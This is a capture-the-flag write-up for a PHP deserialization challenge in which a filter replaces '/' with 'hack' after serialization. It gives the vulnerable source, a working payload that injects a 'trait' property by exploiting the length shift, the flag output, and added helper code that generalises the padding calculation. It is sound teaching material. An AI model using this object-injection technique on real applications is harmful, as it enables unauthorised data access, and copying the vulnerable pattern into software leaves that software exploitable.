Source
<?php
// Challenge source, kept deliberately vulnerable exactly as on the original page.
function filter($params) {
    // Runs on the already-serialized string: each 1-byte "/" becomes the
    // 4-byte "hack", but the s:N: length prefixes were computed before this.
    $safe = array("flag", "/");
    return str_replace($safe, "hack", $params);
}

class Scorpio {
    var $hobby;
    var $trait = 'Mystery';
    function __construct($hobby) { $this->hobby = $hobby; }
}

if (isset($_REQUEST['Scorpio'])) {
    $data = new Scorpio($_REQUEST['Scorpio']);
    var_dump($data);
    $serData = serialize($data);
    $profile = unserialize(filter($serData));
    if ($profile->trait === 'escaping') {
        echo file_get_contents("/flag");
    }
} else {
    // "The system detected a vulnerability here; run an attack test"
    echo "系统检测发现该处漏洞,进行攻击测试\n";
}
?>
POC
<?php
// Same filter() and class as the challenge, so the payload can be built and checked locally.
function filter($params) {
    $safe = array("flag", "/");
    return str_replace($safe, "hack", $params);
}

class Scorpio {
    var $hobby;
    var $trait = 'Mystery';
    function __construct($hobby) { $this->hobby = $hobby; }
}

// Each "/" grows by 3 bytes under filter(); 10 of them make room for the
// 30-byte tail that closes hobby, injects trait, and closes the object.
$repeat = str_repeat("/", 10);
$hobby = $repeat . '";s:5:"trait";s:8:"escaping";}';
echo $hobby;   // this is the value to send as the Scorpio parameter
$param = serialize(new Scorpio($hobby));   // what the server serializes before filter()
//////////";s:5:"trait";s:8:"escaping";}
Passing in the payload gives:
object(Scorpio)#1 (2) {
  ["hobby"]=>
  string(40) "//////////";s:5:"trait";s:8:"escaping";}"
  ["trait"]=>
  string(7) "Mystery"
}
Sonder{135d79-ba631f65200a5f-870225232871-7af1e740}
How it works: filter() runs on the already-serialized string, so every "/" (1 byte) becomes "hack" (4 bytes) while the length prefix s:40: stays as it was computed before filtering. The 10 slashes therefore add 30 bytes, exactly the length of the tail ";s:5:"trait";s:8:"escaping";}. When unserialize() reads 40 bytes for hobby it consumes only the ten "hack"s, and the tail that follows is parsed as the closing quote of hobby, a second property trait with the value escaping, and the } that ends the object (the declared property count of 2 is still satisfied). The original s:5:"trait";s:7:"Mystery";} now sits after that premature } and is ignored, so $profile->trait === 'escaping' holds and the flag is printed. The count must be exact: with one slash fewer or more, the length prefix no longer lines up with the filtered data and unserialize() returns false instead of an object.
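The following is an added worked example, not code from the original page or its author. It reuses the challenge's filter() and Scorpio class verbatim and adds two helpers of my own naming: build_payload(), which generalises the padding calculation to any filter that lengthens a string by a fixed amount per match, and exploit_locally(), which replays the server's serialize → filter → unserialize pipeline so the injected trait can be checked before anything is sent. The round-trip depends only on PHP's own serialize()/unserialize() semantics.

```php
<?php
// Added example (not from the original write-up). Assumes the challenge's
// filter() and Scorpio class exactly as shown above; build_payload() and
// exploit_locally() are hypothetical helper names chosen here.

function filter($params) {
    $safe = array("flag", "/");
    return str_replace($safe, "hack", $params);
}

class Scorpio {
    var $hobby;
    var $trait = 'Mystery';
    function __construct($hobby) { $this->hobby = $hobby; }
}

// Generic padding calculation: each occurrence of $from grows by
// strlen($to) - strlen($from) bytes after filtering. The injected tail is
// absorbed only if its length is an exact multiple of that growth, so the
// check below refuses tails that would leave the length prefix misaligned.
function build_payload(string $from, string $to, string $tail): string {
    $growth = strlen($to) - strlen($from);
    if ($growth <= 0) {
        throw new InvalidArgumentException("filter must lengthen the string for this technique");
    }
    if (strlen($tail) % $growth !== 0) {
        throw new InvalidArgumentException(
            "tail length " . strlen($tail) . " is not a multiple of growth $growth; pad the tail"
        );
    }
    return str_repeat($from, intdiv(strlen($tail), $growth)) . $tail;
}

// Replays the vulnerable pipeline locally and returns the resulting trait,
// or null when unserialize() rejects the filtered data.
function exploit_locally(string $hobby): ?string {
    $serData = serialize(new Scorpio($hobby));
    // "@" silences the "Extra data" warning PHP 8.3+ emits for the trailing
    // ";s:5:"trait";s:7:"Mystery";} left after the injected "}".
    $profile = @unserialize(filter($serData));
    return $profile instanceof Scorpio ? $profile->trait : null;
}

$tail = '";s:5:"trait";s:8:"escaping";}';      // 30 bytes
$payload = build_payload("/", "hack", $tail);  // 10 slashes + tail, as on the page
echo "payload: $payload\n";
echo "filtered: " . filter(serialize(new Scorpio($payload))) . "\n";
echo "trait after round-trip: " . exploit_locally($payload) . "\n";   // escaping

// One slash short: s:39: now swallows part of the tail, unserialize() fails.
var_dump(exploit_locally(str_repeat("/", 9) . $tail));                // NULL
```

Run with php on the command line; the "filtered:" line makes the shift visible, since the ten "hack"s fill the 40 bytes that s:40: announces and the injected tail starts immediately after them. If the tail you want to inject is not a multiple of the growth, lengthen it with harmless padding inside an injected string value (for example a longer property value with an updated s:N:) rather than changing the slash count, because the length prefix must match the filtered data byte for byte.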
Reference: https://www.yuque.com/shiyizhesonder/sonder39/xps4p25lgkgwi2a8